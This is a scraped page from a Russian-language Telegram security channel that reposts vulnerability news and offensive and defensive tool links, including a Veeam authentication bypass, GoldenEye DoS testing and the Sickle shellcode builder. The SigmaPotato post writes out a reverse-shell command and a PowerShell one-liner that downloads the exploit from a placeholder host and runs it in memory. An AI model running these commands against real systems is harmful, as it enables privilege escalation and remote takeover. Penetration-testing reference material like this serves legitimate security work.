Fsecurity | HH
الذهاب إلى القناة على Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
إظهار المزيد2 008
المشتركون
-224 ساعات
لا توجد بيانات7 أيام
-1230 أيام
أرشيف المشاركات
2 008
Repost from APT
🖥 Veeam Enterprise Manager Authentication Bypass
May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user. , the CVSS for this vulnerability is 9.8.
🔗 Source:
https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
🔗 PoC:
https://github.com/sinsinology/CVE-2024-29849
#veeam #authentication #bypass #cve
2 008
Repost from Pentest HaT
🏃 SigmaPotato 1.2.6
Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege
Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.
whoami /priv
Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a
Примеры:
./SigmaPotato.exe --revshell ip port
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","ip","port"))
Windows 8/8.1 - Windows 11 Windows Server 2012 - Windows 2022💻 Home 💻 Download #potato #lpe #windows #soft #sigmapotato ✈️ // Pentest HaT 🎩
2 008
open-appsec - это механизм безопасности машинного обучения, который превентивно и автоматически предотвращает угрозы для веб-приложений и API. Это репозиторий включает основной код и логику.
🔗Ссылка:
https://github.com/openappsec/openappsec
2 008
HTB Sherlock: Constellation
🔗Ссылка:
https://0xdf.gitlab.io/2024/06/05/htb-sherlock-constellation.html
2 008
GoldenEye — это инструмент тестирования DoS-атак HTTP. Этот инструмент можно использовать для проверки уязвимости сайта к атакам типа «отказ в обслуживании» (DoS). Можно открыть несколько параллельных подключений к URL-адресу, чтобы проверить, может ли веб-сервер быть скомпрометирован.Установка:
sudo apt install goldeneye🔗Ссылка: https://www.kali.org/tools/goldeneye/
2 008
Snort - это анализатор / регистратор пакетов на базе libpcap, который можно использовать в качестве облегченной системы обнаружения сетевых вторжений. Он поддерживает ведение журнала на основе правил и может выполнять поиск / сопоставление содержимого в дополнение к обнаружению множества других атак и зондов, таких как переполнение буфера, скрытое сканирование портов, CGI-атаки, SMB-зонды и многое другое. Snort обладает возможностью оповещения в режиме реального времени, при этом оповещения отправляются в системный журнал, отдельный файл “alert” или даже на компьютер с Windows через Samba.
🔗Ссылка:
https://www.kali.org/tools/snort/
2 008
Repost from TaipanByte CTF
Всем привет! 😎
Мы добавили несколько райтапов на таски Codeby.games:
🗂Архиватор
#web #easy
🔐Доступ запрещен
#web #medium
💸Базовая авторизация 2
#web #medium
🦖Мистер Дино
#web #easy
🍯Ханипот
#web #easy
👩👩👦Семья
#crypto #easy
㊙️Руны, руны, и ещё раз руны
#crypto #medium
🪆Матрешка
#forensic #easy
#codeby #writeup
2 008
Sickle - это инструмент для разработки полезной нагрузки, изначально созданный для помощи в создании шеллкода, однако его можно использовать и для создания полезной нагрузки для других типов эксплойтов (недвоичных). Хотя текущие модули в основном предназначены для сборки, этот инструмент не ограничивается шеллкодом.
🔗Ссылка:
https://www.kali.org/tools/sickle-tool/
2 008
Хочу также посоветовать:
1 - Наш discord сервер! Где можно пообщаться 👾
2 - Мой Github 🦑
Наш второй канал [Ximera-Chan]
2 008
vopono - это инструмент для запуска приложений через VPN-туннели через временные сетевые пространства имен. Это позволяет вам запускать только несколько приложений через разные VPN одновременно, сохраняя при этом ваше основное соединение в обычном режиме.
🔗Ссылка:
https://www.kali.org/tools/vopono/
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
